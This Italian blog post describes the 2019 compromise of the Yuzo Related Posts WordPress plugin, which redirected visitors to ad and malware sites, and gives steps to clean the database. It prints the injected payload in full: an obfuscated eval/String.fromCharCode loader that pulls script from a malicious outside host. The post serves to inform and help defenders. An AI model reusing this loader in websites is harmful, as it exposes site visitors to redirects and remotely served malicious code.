Circa un’ora fa, una pagina WordPress che gestiamo ha iniziato a reindirizzare a pagine di Advertising / Malware.
Ho trovato la fonte del reindirizzamento, desidero fornire assistenza agli altri interessati e ho bisogno di aiuto per trovare la vulnerabilità effettiva e / o una correzione.
Il reindirizzamento avviene dopo che il sito ha terminato il caricamento, quindi cercavo uno snippet di codice JavaScript nella pagina e reindirizzamenti dubbi nel Network Analyzer. I reindirizzamenti malevoli evidenti sono stati: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk.
Sono stato in grado di rintracciare i reindirizzamenti in arrivo da https://hellofromhony.org/counter che è incorporato tramite un frammento di codice.
Lo snippet era incorporato in wp_options in una voce con la chiave ‘yuzo_related_post_options’ – più specificamente incorporato nell’opzione json ‘yuzo_related_post_css_and_style’ del option_value.
Questa opzione fa parte del plugin dei post correlati di Yuzo, che è stato interrotto circa una settimana fa: https://wordpress.org/plugins/yuzo-related-post/
YUZO Related Posts vulnerabilità e fix
La rimozione di questo plugin ha interrotto immediatamente il reindirizzamento, non sono stato in grado di trovare altre tracce di manomissione del sito.
Nello specifico è bene seguire i seguenti passaggi per mettere al sicuro il proprio sito :
– Rimuovi / Disinstalla il plugin immediatamente.
– All’interno del tuo database vai alla wp_optionstabella e cerca il valore yuzo_related_post_optionscancella quel record.
– Non eliminare la tabella delle visite wp_yuzoviews, questo non influenza il problema.
Lo snippet che era nel option_value:
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>Durante la rimozione del plug-in viene visualizzato un quickfix, voglio approfondire ulteriormente per assicurarmi che non ci sia accesso al database, al backend e allo spazio web.
Se anche voi siete vittime di questo attacco e non siete in grado di risolvere questo problema in autonomia, chiedete pure il nostro aiuto tramite il servizio di Rimozione Malware e Virus WordPress.
Update a breve di Yuzo Related Posts
Come comunicato dall’autore del Plugin a breve verrà rilasciato un upgrade del plugin sebbene il plugin sia cessato esattamente qualche giorno fa a Marzo 2019. Non rimane che eseguire gli step sopra indicati e aspettare la nuova release.